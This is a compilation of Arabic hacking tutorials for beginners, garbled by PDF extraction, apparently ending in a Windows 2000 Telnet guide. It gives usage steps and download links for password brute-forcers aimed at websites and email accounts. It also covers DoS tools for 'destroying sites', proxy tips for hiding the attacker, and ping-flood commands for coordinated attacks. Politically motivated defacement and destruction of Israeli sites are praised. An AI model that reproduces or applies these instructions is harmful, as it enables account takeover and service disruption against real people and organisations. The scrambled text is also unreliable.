‬أي أن باستطاعة هذا البرنامج التصال بالسيرفر‬ ‫أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها ‪ .‬‬ ‫===========================================================‬ ‫==========‬ ‫تلنت )‪ -:(Telnet‬و هو برنامج صغير موجود في الويندوز ‪ .‬‬ ‫لستخدام البرنامج ‪ ،‬اذهب الى ‪ Start ==> Run ==> telnet‬و ستظهر شاشة التلنت‪.‬‬ ‫‪23‬‬ .‬فال الموفق‪.‬‬ ‫‪------------------------------------------------------------------------‬‬ ‫برامج السكان أو ‪ -:Scanner‬و هي برامج موجودة للمسح على المواقع و كشف‬ ‫ثغراتهاإن وجدت ‪ ،‬فهي سريعة‪ ،‬كما أنها تملك قاعدة بيانات واسعة و كبيرة‬ ‫تحتوي على الثغرات أو الكسبلويت )‪ (Exploits‬التي يتم تطبيقها على الموقع‬ ‫لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم ل ‪ .‬و هو يعمل ككلينت‬ ‫أو وضعيته تكون دائما كزبون ‪ .‬و من أمثلة‬ ‫هذه البرامج‪ ،‬برنامج ‪ Shadow Security Scanner‬و ‪ Stealth‬و ‪Omran Fast‬‬ ‫‪ ، Scanner‬الخ ‪.‫>ةةةةة<‬ ‫>ةةةةةة‪<BeReal :‬‬ ‫السلم عليكم‬ ‫لقد اعددت هذا الملف لخواني المبتدئين في تعلم طرق اختراق المواقع ‪ ،‬فقد‬ ‫تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد ل يفهمونها ‪،‬‬ ‫و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم ‪ .‬‬ ‫و لهذه البرامج أنواع مختلفة ‪ ،‬منها التي تقوم بعمل سكان على نظام أو سيرفر‬ ‫معين مثل البرامج المختصة بالسكان على سيرفرات الـ ‪ IIS‬و منها برامج المسح‬ ‫على ثغرات السي جي اي فقط ‪ CGI‬و ما الى ذلك ‪.‬يستخدمه الهاكرز‬ ‫غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ‪ ،‬و للتصال بالسيرفر‬ ‫عبر بورت معين و خصوصا بورت الف تي بي )‪ (21‬للدخول الى الموقع بطريقة خفية‬ ‫‪ Anonymous Mode‬لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات‪.

‫‪-----------------------------------------------------------------------‬‬ ‫اكسبلويت )‪ -:(Exploits‬هي برامج تنفيذية تنفذ من خلل المتصفح ‪ .‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫الجدار الناري ‪ -:FireWall‬هي برامج تستعملها السيرفرات لحمايتها من الولوج‬ ‫الغير شرعي لنظام ملفاتها من قبل المتطفلين ‪ .‬أشهر هذه الكومبايلرات ) المترجمات أو المحولت ( برنامج اسمه‬ ‫‪ Borland C++ Compiler‬و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا‪.‬هي تمثل الحماية للسيرفر طبعا ‪،‬‬ ‫و لكني أنوه بأن الفايروولت المستخدمة لحماية السيرفرات ) المواقع ( تختلف‬ ‫عن تلك التي تستخدم لحماية الجهزة ‪.‬‬ ‫هذه الكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها‬ ‫أي الكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلل المتصفح ‪ ،‬و لتحويل‬ ‫الكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ‪ ،‬نحتاج إما الى‬ ‫نظام التشغيل لينوكس او يونكس ‪ ،‬او الى اي كومبايلر يعمل ضمن نظام التشغيل‬ ‫ويندوز ‪ . (c. Fire Wall‬و هناك بعض الكسبلويتات المكتوبة بلغة السي و يكون‬ ‫امتدادها )‪.‬و لها عنوان‬ ‫‪ ، URL‬تقوم هذه الكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى‬ ‫السيرفر و التجول فيه ‪ ،‬كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين‬ ‫في السيرفر لعمل كراش له ‪ ،‬و هذا ما يسمى بـ ‪.‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪24‬‬ . Buffer Over Flow Exploits‬‬ ‫هناك أنواع من الكسبلويت ‪ ،‬فمنها ال ‪ CGI Exploits‬أو ال ‪ CGI Bugs‬و منها‬ ‫ال ‪ Unicodes Exploits‬و منها ال ‪ ، Buffer Over Flow Exploits ،‬و منها‬ ‫ال ‪، PHP Exploits‬و منها ال ‪ DOS Exploits‬و التي تقوم بعملية حجب الخدمة‬ ‫للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر‬ ‫أي فايروول ‪ .

‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ : passwd file‬هو الملف الذي يحتوي على باسورد الروت و باسوردات الشخاص‬ ‫المصرح لهم بالدخول الى السيرفر ‪ . Shadow file‬تجده في‬ ‫‪. Shadowed‬إن وجدت ملف الباسورد مظلل ‪ ،‬فيجب عليك حينها‬ ‫البحث عن ملف الباسورد الغير المظلل و الذي يسمى ‪ .‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ -:Valnerableties‬أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب‬ ‫و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى‬ ‫استغللها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره ‪.‬و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة‬ ‫بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع‬ ‫‪ Security Focus‬أو بوق تراك او غيرها ‪.‬باسورد الموقع موجود في نفس الملف طبعا‪.‬‬ ‫ما هي مفردها ؟ ‪ Valnerable ، (:‬أي ثغرة أو بالصح موضع الضعف و المكان‬ ‫الغير مؤمن بشكل سليم ‪ .‫‪ -:Token‬هو ملف الباسورد المظلل )‪ (Shadowed Passwd‬و الذي يكون فيه الباسورد‬ ‫على شكل * أو ‪ x‬أي ‪ .‬‬ ‫‪---------------------------------------------------------------------‬‬‫الجذر أو الـ ‪ : root‬و هو المستخدم الجذري و الرئيسي للنظام ‪ ،‬له كل الصلحيات‬ ‫‪25‬‬ .‬هناك خاصية في برامج الف تي بي بنفس السم ‪ ،‬تستطيع ان تستعملها‬ ‫في الدخول المجهول الى السيرفر و سحب الملفات منه ‪. etc/shadow/‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ -:Anonymouse‬هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد‬ ‫اختراقه‪ .

‬‬ ‫انتهى‪،،،‬‬ ‫"اختراق المواقع للمبتدئين"‬ ‫الختراق للمبتدئين‪:::‬‬ ‫‪26‬‬ .‬‬ ‫و هي شبيهة نوعا ما بعملية حجب الخدمة ‪ .‬‬ ‫غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن‬ ‫نظام التشغيل لينوكس او يونكس و سولري و فري بي اس دي و غيرها ‪.‬‬ ‫‪---------------------------------------------------------------------‬‬‫السيرفر ‪ :Server‬هو الجهاز المستضيف للموقع ‪ ،‬اذ أن كل ملفات الموقع توضع فيه‬ ‫فهو جهاز كمبيوتر عاد كغيره من الجهزة لكنه ذو امكانيات عالية ككبر حجم القرص‬ ‫الصلب و سرعته الهائلة ‪ ،‬و هو متصل بالنترنت ‪ 24‬ساعة ‪ ،‬و هذا هو سبب كون‬ ‫المواقع شغالة ‪ 24‬على النترنت ‪ ..‬جزاكم ال خيرا أيها المجاهدون ‪.DOS -‬اذ أنها تقوم بعملية اوفر لود على‬ ‫جزء مركز من السيرفر ‪.‫في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات‪. -‬‬ ‫‪----------------------------------------------------------------------‬‬‫بوفر أوفر فلو ) ‪ : ( Buffer over Flow‬و هي نوع من أنواع الكسبلويتات التي‬ ‫تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الف تي بي‬ ‫أو غيره لجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و للغاء الرقعة‬ ‫الموجودة بها كي يتم استغللها مجددا ‪ -‬بعد عمل الكراش لها طبعا ‪ -‬يتم استغللها‬ ‫في معاودة التصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها ‪.‬ضربة الهاكرز طبعا هي اختراق‬ ‫السيرفر الذي يملك الكثير من المواقع ‪ ،‬فيسهل حينها اختراق جميع المواقع التي‬ ‫تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو‬ ‫سرقة بياناتها و تدميرها أو مسحها من النت تماما ‪ ،‬و هذا ما يحدث للمواقع‬ ‫السرائيلية و بكثرة و ل الحمد ‪ . (:‬قد يملك و يستضيف السيرفر أكثر من موقع‬ ‫واحد‪ ،‬و هذا يعتمد من سيرفر لخر و من شركة لخرى‪ .

‬وهذه البرامج تحتوي على قائمة كبيرة تحتوي على كلمات سر يقوم‬ ‫البرنامج بتجربها على الموقع الهدف الى أن يصل إلى كلمة السر الصحيحة الخاصة بالموقع الهدف وبعد‬ ‫ذلك يسيطر المخترق على الموقع‪ .‫في هذا القسم سوف أقوم بشرح الطرق المستخدمة في اختراق المواقع بالنسبة للمبتدئين وهذه الطرق تعتمد‬ ‫اعتمادًا كليًا على برامج التخمين‪ .‬‬ ‫انتهى‪،،،‬‬ ‫" الختراق ببرنامج ‪" Webcrack‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫‪27‬‬ .‬لكن يعيب هذه الطريقة أنها تستمر إلى أوقات طويلة بالساعات وباليام‬ ‫وهي مكلفة ماديا لن الجهاز سيبقى متصل طوال الوقت بالنترنت حتى يتم اكتشاف كلمة السرالصحيحة‪.

..‬احب اقول‬ ‫انه واحد من اقوى البرامج لاختراق المواقع وانا من الشخاص الذين يعتمدون عليه‬ ‫الشرح ‪..‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫مرحبا شباب‬ ‫انا اعلم ان الكثير منك يعرفون هذا البرنامج لكن هل جربتوه ‪ ...‬‬ ‫‪28‬‬ .

29 .

dunbell.freeserve.co.‫وهذي وصلة البرنامج‬ http://www.uk/webcrack40.zip ،،،‫انتهى‬ " MungaBunga ‫"الختراق ببرنامج‬ 30 .

.‫>ةةةةة<‬ ‫>ةةةةةة‪< KING HAKER :‬‬ ‫السلم عليكم و رحمه ال على اخوانى‪:‬‬ ‫اليوم نشرح برنامج ‪ MUNGA BUNGA‬الذى يعد من افضل برامج اختراق اليميل حتى الن و لكن‬ ‫يوجد به عيب بسيط و هو انه ل يوجد به بروكسى‬ ‫اما مميزاته فكثيره جدا‪:‬‬ ‫‪-1‬سريع جدا فى تجربه الكلمات‬ ‫‪-2‬يواصل التجربه تلقائيا بعد انقطاع الخط‬ ‫‪-3‬يمكنك اختراق المواقع به ايضا‬ ‫‪-4‬يعلن لك حاله اتصاله بسرفر اليميل الذى تخترقه‬ ‫‪-5‬يمكنك التحكم فى عدد حروف الكلمات الذى سيبدا بها)حسب التوقع(‬ ‫‪-6‬يحتوى على قائمه باسوردس خاصه بالهوت ميل و بها عدد هائل من الكلمات المتوقعه‬ ‫و كذلك بالنسبه للياهو‬ ‫و السرفرات الخرى ايضا‬ ‫و الن نبدا الشرح‪:‬‬ ‫هذا شكل البرنامج عند تشغيله‬ ‫فى رقم ‪ 1‬تضع اليميل الذى ستخترقه‬ ‫فى ‪ 2‬تضغط ‪ BROWSE‬و تضع قائمه الباسوردس المليئه بالكلمات الذى سيقوم البرنامج بتجربتها‬ ‫فى ‪ 3‬تضغط على ‪ BROWSE‬ايضا و تضع القائمه الخاصه بسرفر اليميل الذى ستخترقه )اذا كان فى‬ ‫الهوت ميل تضع قائمه الهوت ميل ‪...‬الخ(‬ ‫‪ 4‬هو زر بدء الهكر على اليميل و تجربه الكلمات‬ ‫‪31‬‬ ..

mbnet.‫فى ‪ 5‬يعرض الباسوردس التى يجربها الن )فى وقت الهكر(‬ ‫فى ‪ 6‬يعرض الكلمات التى بها اخطاء و سيتم المحاوله بها مره اخرى‬ ‫‪ 7‬هى حاله التصال بالسرفر الموجود به اليميل‬ ‫فى ‪ 8‬يعرض معلومات السرفر التابع لليميل الذى يجرب عليه‬ ‫بالضغط على رقم ‪ 9‬تذهب مباشره الى موقع البرنامج الرئيسى‬ ‫نضع علمه صح امام ‪ 10‬حتى اذا انقطع الخط فجاءه يتوقف البرنامج و عند معاوده التصال يستمر فى‬ ‫التجربه و ل يبدا من الول‬ ‫عند و ضع العلمه على ‪ 11‬ل يجرب البرنامج الكلمات التى بها اخطاء التى تظهر فى رقم ‪6‬‬ ‫نضع علمه صح امام ‪ 12‬حتى ل يجرب البرنامج الكلمات التى تحتوى على مسافات‬ ‫عند وضع العلمه على ‪ 13‬ل يجرب البرنامج الكلمات التى اقل من خمس احرف )مطلوب فى الهوت ميل(‬ ‫و عند وضع العلمه ايضا على ‪ 14‬ل يجرب البرنامج الكلمات التى هى اكثر من عشره احرف‬ ‫اليس برنامج ممتاز‬ ‫و قوى و سريع‬ ‫وصلة التنزيل ‪:‬‬ ‫‪http://koti.htm‬‬ ‫انتهى‪،،،‬‬ ‫" برنامج تدمير المواقع ‪" WinSmurf‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫‪32‬‬ .fi/hypnosis/caliberx/cracking.

zip‬‬ ‫انتهى‪،،،‬‬ ‫" شرح برنامج ‪ Evil Ping‬لتدمير المواقع "‬ ‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫‪33‬‬ .‬‬ ‫‪http://www.de/files/WSmurf..planet-eagle....‬‬ ‫إذا هاهو البرنامج الحديث من ‪ winsmurf‬والذي يسميه البعض مرعب المواقع‬ ‫‪Scree Shot‬‬ ‫‪--------------------------------------------------------------‬‬ ‫‪-------------------------------------------------------------‬‬‫*** كيف تستخدم ‪ winsmurf‬؟ ***‬ ‫في غاية البساطة فقط قم بإنشاء ملف ‪ txt‬يعني نصي وحط في حروف وأرقام كثيرة يعني حاول تخلي الملف‬ ‫كبير شوي وبتعدى ‪ Kb 10‬بعدين احفظه‬ ‫وبعد كذا قم بتشغيل ‪winsmurf‬‬ ‫واستعرض الملف ‪.‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫أثبت هذا البرنامج فعاليته الكبيرة في تدمير المواقع ولسيما أنه قوي جدا في إرسال طلبات وسريع ‪.‬‬ ‫وصلة البرنامج‪.

‬استخدامه من قبل ‪ 200‬شخص على القل في نفس الوقت على نفس الموقع لينجح التدمير بإذن ال عزوجل‬ ‫‪.‫‪.‬ويمكن زيادة الهجمات لتصبح أقوى حتى يتم تدمير الموقع‬ ‫‪،،،‬انتهى‬ ‫" شرح برنامج الدرة لتدمير المواقع "‬ ‫>ةةةةة <‬ ‫‪34‬‬ .

‬‬ ‫و لتخفي هويتك عند الهجوم قم بتشغيل ‪:‬‬ ‫و ضع رقم البروكسي التالي‬ ‫‪35‬‬ .‬فك ضغط الملف ‪ .‬و عند تشغيله سيظهر لك الشكل التالي ‪:‬‬ ‫لبدء الهجوم فقط إضغط على‬ ‫وليقاف الهجوم إضغط على‬ ‫عند بدء الهجوم سيعمل برنامج الدرة على بحث البروكسي الخاص بك و سيضعه لك في مكانه‪.‫عند النتهاء من تحميل البرنامج ‪ .

‫وسيكون عنوان الموقع المراد الهجوم عليه هنا‬ ‫و من خواص هذا البرنامج انه ل يستطيع احد تغيير جهة الهجوم و لتجديد عنوان الموقع المراد الهجوم عليه‬ ‫و هو سيقوم تلقائيا بالبحث و التغيير‪.‬‬ ‫و لعمل البرنامج بطريقة ذكية بحيث ل يبطيء النترنت ‪ .‬‬ ‫فقط قم بضغط‬ ‫و لمعرفة آخر اخبار البرنامج و المواقع التي تم النجاح بقصفها فقط قم بضغط ‪:‬‬ ‫و سيظهر لك الشكل التالي ‪:‬‬ ‫قم بضغط‬ ‫و ستظهر لك الخبار‪.‬قم بتشغيل ‪:‬‬ ‫لتشغيل البرنامج عند عمل الوندوز قم بتشغيل ‪:‬‬ ‫‪36‬‬ .

.com/boom_q8y4/dorrah.geocities.zip‬‬ ‫‪،،،‬انتهى‬ ‫" تدمير المواقع بدون برامج "‬ ‫> ةةةةةة‪:‬ةةةة ةةة <‬ ‫‪37‬‬ .‫الشكل التالي يمثل عدد المرات الناجحة ‪:‬‬ ‫‪ :‬و هذا يمثل عدد المرات الفاشلة‬ ‫‪.‬وصلة تحميل البرنامج‬ ‫‪http://www.

‬بعد ذلك سيخرج لك رقم أي بي الموقع‬ ‫‪:‬قم بكتابة المر‬ ‫)اسم الموقع( )قوة الضربه( ‪) I-‬عددالضربات( ‪ping -n‬‬ ‫مثال ذلك‪:‬‬ ‫‪ping -n 1000 -l 400 www..xx.‫في هذا الدرس سأقوم بشرح عدة طرق لتدمير المواقع بدون برامج ولكن هناك شرط لتدميرها أن يجتمع عدد‬ ‫‪.‬كبير على الموقع نفسه ويقوموا بتطيق الطريقة معا بعض في نفس الوقت‬ ‫‪::‬الطريقة الولى‬ ‫قم بالتوجه إلى "الدوس" ===<== اكتب المر التالي ‪:‬ـ‬ ‫‪Ping www.‬‬ ‫قم بكتابة المر‪:‬‬ ‫‪ping -t ip‬‬ ‫حيث ‪ ip‬يعني أي بي الموقع الموراد‪.‬‬ ‫انتهى‪،،،‬‬ ‫" التلنيت "‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫‪38‬‬ .com‬‬ ‫الطريقة الثانية‪::‬‬ ‫بعد استخراج الي بي تبع الموقع المراد بالطريقة الي في العلى‪..com‬‬ ‫‪ :Xxx‬يعني اسم الموقع‬ ‫‪...xxx.

and password. the Telnet service is set to manual startup. the user cannot log on to the Telnet service when NTLM authentication is used. or configure the Telnet service for ‫ تكون خدمة التلنت غير منشطة وتكون‬2000 ‫ في التثبيت الفتراضي لويندوز‬.change the password. You can use the Services snap-in or the Computer Management snap-in to start. the client uses the Windowname ‫يمكن استعمال‬.‫بعد قراءة هذا الموضوع ستكون قادر على‬ ‫فهم معنى خدمة التلنت‬ ‫معرفة مكان تشغيل الخدمة والتحكم بها‬ ‫تمرين التثبيت وإستخدام التلنت‬ ‫ تسمح لمستخدمين عميل التلنت بالتصال بكمبيوتر يشغل خدمة التلنت‬2000 ‫خدمة التلنت في ويندوز‬ ‫ ويمكن أن تكون خدمة التلنت عبارة لتصال‬، ‫وإستعمال سطر الوامر ويصبح كما لو كان يجلس أمامه‬ ‫المستخدمين مع بعضهم البعض‬ ‫ عميل تلنت في أي وقت‬63 ‫وأي كمبيوتر يشغل خدمة التلنت يمكن أن يدعم إلى‬ Telnet Authentication You can use your local Windows 2000 user name and password or domain account information to access the Telnet server. If you do not use the NT LAN Manager (NTLM) authentication option. and then log on through the Telnet client ‫الخيار منشط في خصائص كلمة المرور لحد المستخدمين لن يتمكن من الدخول على ملقم التلنت عند‬ ‫ يجب الدخول ثم تغير كلمة المرور ثم التسجيل على خدمة التلنت‬NTLM ‫إستخدام‬ ‫تشغيل و إيقاف ملقم التلنت‬ In a Windows 2000 Server default installation. The security scheme is integrated into Windows 2000 security. The user must log on to the server directly and ‫ إذا كان هذا‬. The user name and password are encrypted ‫ إذا كنت تستخدم خيار التحقق من‬، ‫اسمك وكلمة المرور الخاصه بك من اجل الوصول إلى ملقم التلنت‬ ‫ سيرسل السم و كلمة المرور مشفرة وإذا لم تكن مستخدمة سترسل كنص عادي‬NTLM ‫الصحة‬ ‫ملحظة‬ If the User Must Change Password At Next Logon option is set for a user. the user name and password are sent to the Telnet server as plain text.s 2000 security context for authentication and the user is not prompted for a user If you are using NTLM authentication. stop.automatic startup ‫ لتشغيل أو إيقاف خدمة التلنت‬Services ‫ ويمكن إستخدام الداة‬، ‫على الوضع اليدوي‬ 39 .

You can also use it to get a list of current users. Telnet is a service located under the Services and Applications node.msi) ‫ تحتاج إلى تثبيت أدوات الدارة‬.Start ‫ أو اضغط‬Administrative Tools ‫في‬ .registry settings ‫على معلومات عن الملقم ويمكن كذلك الحصول على عدد المستخدمين و التحكم في الجلسة الحالية من‬ ‫إنهاء التصال و تغير العدادات‬ ‫ الموجودة‬Telnet Administration Tool ‫ أضغط على‬.tlntadmn ‫ اكتب‬.‫مكان التلنت‬ In the Computer Management snap-in. terminate a user's session. Telnet Server Admin ‫لفتح الداة‬ ‫ إذا كنت ل‬.Run ‫ ثم‬. Select Services from the console . or get information about Telnet Server. or change Telnet Server ‫ لتشغيل أو إيقاف أو الحصول‬Telnet Server Admin ‫يمكن إستخدام الداة‬. and then press Enter. type net stop tlntsvr or net stop telnet at the command prompt. Telnet Server Admin ‫تستطيع فتح الداة‬ Telnet Server Administration ‫يبين الجدول التالي خيارات الداة‬ ‫الوصف‬ ‫السم‬ ‫الخيار‬ Telnet Server Admin ‫ينهي جلسة الداة‬ Quit this application 0 ‫يبين المستخدمين المتصلين بخدمة التلنت مع توضيح اسم المستخدم و الدومين و وعنوان‬ ‫الجهاز ووقت الدخول‬ List the current users 1 ‫ ينهي جلسة أحد المستخدمين الذي أنت تختاره‬Terminate a user session 2 ‫يزود قائمة بإعدادات السجل التي يمكن تغيرها‬ Display/change registry settings 3 ‫يشغل خدمة التلنت‬ Start the service 4 ‫يوقف خدمة التلنت‬ Stop the service 5 ‫إصطياد المشاكل‬ ‫يبين الجدول التالي بعض المشاكل التي يمكن أن تواجهك عند إستخدام التلنت‬ 40 .(Adminpak. stop. and then press . To stop Telnet Server. To start Telnet Server.OK ‫ ثم‬.Enter Telnet Server Admin ‫الداة‬ You can use the Telnet Server Admin utility to start. type net start tlntsvr or net start telnet at the command prompt. and then select Telnet from the list of services in the details pane ‫تشغيل التلنت و إيقافة من سطر الوامر‬ You can also start or stop the Telnet service from a command prompt.tree.

a computer using Microsoft Telnet Client can log on to a Windows 2000 computer running the Telnet . The Telnet client software allows a computer to connect to a remote server. As a command-line application.and local logon simulations are some typical uses of Telnet The Telnet client uses the Telnet protocol. games. You can use the Telnet client provided with Windows 2000 to connect to a remote computer. part of the TCP/IP suite of protocols. type help at the Microsoft Telnet command prompt. type open <computer_name> where <computer_name> is the IP address or host name of the computer . To connect to a site.‫ في موجه الوامر‬telnet ‫ وتستطيع كتابة‬.‫الحل‬ ‫السبب‬ ‫رسالة الخطاء‬ ‫راجع الخيارات وأعد كتابة خيارك‬ ‫القيمة المكتوبة لم تكن مقبولة‬ Invalid input ‫شغل خدمة التلنت‬ ‫خدمة التلنت غير مشتغلة‬ Failed to open the registry key ‫شغل الخدمة‬ ‫خدمة التلنت غير مشتغلة على الملقم‬ Failed to query the registry value ‫عميل التلنت‬ You can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server software.Start ‫ انقر‬.Telnet ‫لتشغيل‬ ‫ مثبت على جهازك ومضبوط تكوينه ويكون‬TCP/IP ‫لتتمكن من أستخدام التلنت يجب أن يكون البروتوكول‬ ‫لديك حساب مسجل على الجهاز الذي ستتصل به‬ To display help for Telnet.service by using NTLM authentication ‫إستعمال التلنت‬ .if you were sitting in front of it Users of previous versions of Microsoft's Telnet client may notice a few changes in the version included with Windows 2000.running the Telnet service 41 . Microsoft Telnet Client will seem very familiar to users of . log on to the remote computer.Run ‫ ثم‬. and interact with it as . The type of session you conduct depends on how the Telnet software is configured. . Once you have made this connection. system administration. Communication. Using this feature. The most obvious change is that Microsoft Telnet Client is now a command-line application rather than a Windows application.UNIX-based Telnet clients An important new feature found in Microsoft Telnet Client is NTLM authentication support. to connect to a remote computer over a network. you can communicate with the Telnet server.telnet ‫ ثم اكتب‬.

Programs‬ثم ‪ Administrative Tools‬اضغط ‪.OK‬‬ ‫تظهر موجه أوامر مايكروسوفت تلنت‬ ‫اكتب ‪ help‬أو ? لمشاهدة الوامر المتاحه‬ ‫تظهر جميع الوامر المدعومة في خدمة التلنت‬ ‫اكتب ‪open Hishem2‬‬ ‫ستشاهد شاشة الترحيب‬ ‫‪42‬‬ . Start‬‬ ‫اضغط ‪ OK‬لغلق مربع الحوار )‪Local Computer) Telnet properties‬‬ ‫أغلق وحدة التحكم ‪. Services‬‬ ‫سنتصل من ‪ Hishem1‬إلى ‪Hishem2‬‬ ‫من ‪ .Service status‬اضغط ‪.Telnet‬‬ ‫يظهر مربع حوار ‪(The Telnet Properties (Local Computer‬‬ ‫غير ‪ Startup Type‬من ‪ Manual‬إلى ‪. Start‬ثم ‪ .Services‬‬ ‫تظهر الداة ‪Services‬‬ ‫من النافذه مرر ألى اسفل ثم ضغط مزدوج على ‪.‫تمرين ضبط وإتصال بخدمة التلنت‬ ‫في هذا التمرين يجب أن يكون لديك شبكة على القل جهازين متصلين مع بعضهم البعض‬ ‫ولنفترض أن الجهاز الول اسمه ‪ Hishem1‬و الثاني ‪Hishem2‬‬ ‫وسنفترض أن خدمة التلنت مثبته على ‪ Hishem2‬ثم سنقوم بالتصال من ‪ Hishem1‬إلى ‪Hishem2‬‬ ‫سنقوم الن بتثبيت الخدمة على جهاز ‪Hishem1‬‬ ‫سجل الدخول إلى ‪ Hishem1‬ك ‪Administrator‬‬ ‫من ‪ .Run‬‬ ‫اكتب ‪ telnet‬ثم ‪.Automatic‬‬ ‫في القسم ‪. Start‬ثم ‪.

OK‬‬ ‫يظهر إطار اوامر الداة ‪Telnet Server Admin‬‬ ‫اكتب ‪ 1‬لمشاهدة جميع التصالت الحالية كما في المثال نشاهد قد عرض اسم المستخدم و اسم الدومين‬ ‫‪ NOR‬ورقم ‪ IP‬ونوع التصال ووقت الدخول‬ ‫اكتب ‪ 2‬لنهاء جلسة مستخدم‬ ‫‪43‬‬ .Run‬‬ ‫اكتب ‪ tlntadmn‬ثم ‪. Start‬ثم ‪.‫ملحظة‬ ‫يمكن إستخدام حرف ‪ o‬بدل ‪open‬‬ ‫أي اوامر يمكنك تشغيلها من سطر الوامر في ‪Hishem2‬‬ ‫اترك هذا التصال نشط ل توقفه سننتقل الن إلى جهاز ‪ Hishem2‬لمشاهدة جلسة التلنت‬ ‫من جهاز ‪ Hishme2‬سنراقب خدمة التلنت ثم نوقف ونقطع التصال من العميل ‪Hishem1‬‬ ‫من ‪ .

‫تظهر رسالة تطلب منك تحديد هوية المستخدم الذي تريد فصله‬ ‫اكتب ‪1‬هذا رقم المستخدم في القائمة ول يوجد معنا في المثال غير و احد لذالك تكتب ‪1‬‬ ‫تظهر لئحة بالوامر المتاحة‬ ‫إرجع إلى جهاز ‪ Hishem1‬سترا أن التصال قد إنفصل مثل المثال‬ ‫اضغط أي مفتاح للمتابعة‬ ‫كيف نستفيد من خدمة التلنت في جلب البريد‬ ‫إذ تعذر عليك سحب البريد بالبرامج المخصصة لسبب ما يمكن أن تستخدم التلنت لسحب البريد وحذف‬ ‫الرسائل التي قد تكون سبب المشكلة و الطريقة كما يلي‬ ‫تكون على إتصال مع الشبكة‬ ‫من ‪ Start‬ثم ‪ Run‬ثم تكتب ‪ Telnet pop.com 110‬طبعا إذا كان حسابك مع‬ ‫الياهو أو اكتب الحساب الخاص بك مع ملحظة وجود فراغ بين الكلمة الولى و الجملة الثانية و الرقم‬ ‫ستظهر لك نافذة مثل الدوس اكتب ‪ user‬ثم اكتب بعدها اسم المستخدم في بريدك مع ملحظة أن الذي‬ ‫ستكتبه ل تشاهده على النافذة ل تهتم مثل ‪ user xxxx‬ثم إنتر‬ ‫بعد ذلك اكتب ‪ pass‬ثم اكتب الرقم السري مثل ‪ pass xxxx‬ثم إنتر‬ ‫إذا كان إدخالك صحيح ستشاهد كلمة ‪ Ok‬بعد ما تضغط إنتر‬ ‫سيتم إدخالك إلى الحساب‬ ‫لمشاهدة جميع الرسائل وأحجامها اكتب ‪ List‬ثم إنتر‬ ‫ستشاهد ترتيب الرسائل تحت بعض وأمام كل رقم رقم ثاني يدل على حجم الرسالة‬ ‫‪44‬‬ .yahoo.mail.

‬‬ ‫ملحظات‬ ‫يمكنك اختصار هذا المر إلى ‪.‫لحذف رسالة من القائمة اكتب ‪ dele‬ثم رقم الرسالة الهدف‬ ‫تنفع هذه الطريقة مع بريد ‪pop‬‬ ‫طريقة سحب البريد عن طريق التلنت من الدكتور الفنتوخ‬ ‫بعض الوامر المستخدمة مع التلنت‬ ‫وصل عميل التلنت مع جهاز بعيد‬ ‫بناء الجملة‬ ‫‪[open [\\RemoteServer] [Port‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬إن لم تحدد منفذًا ما‪ ،‬سيتم افتراض المنفذ الفتراضي‪.o‬‬ ‫أمثلة‬ ‫للتصال بملقم بعيد ‪ Redmond‬من خلل رقم المنفذ ‪ ،44‬اكتب‪:‬‬ ‫‪o redmond 44‬‬ ‫لقطع تصال عميل ‪ Telnet‬من كمبيوتر بعيد‬ ‫بناء الجملة‬ ‫‪[close [\\RemoteServer‬‬ ‫المعلمات‬ ‫‪45‬‬ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬‬ ‫‪Port‬‬ ‫تحديد المنفذ الذي تريد استخدامه‪ .

